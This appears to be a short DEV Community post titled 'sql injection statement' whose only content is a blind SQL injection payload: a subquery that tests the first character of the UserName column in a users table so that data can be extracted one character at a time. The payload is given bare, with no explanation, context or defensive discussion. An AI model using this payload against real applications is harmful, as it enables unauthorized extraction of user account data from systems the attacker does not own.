DEV Community

Cover image for sql injection statement
BelowTheRoot
BelowTheRoot

Posted on

sql injection statement

(select case when substr(UserName,1,1)='a' then 1 else 4 end from users limit 0,1)
Enter fullscreen mode Exit fullscreen mode

Top comments (0)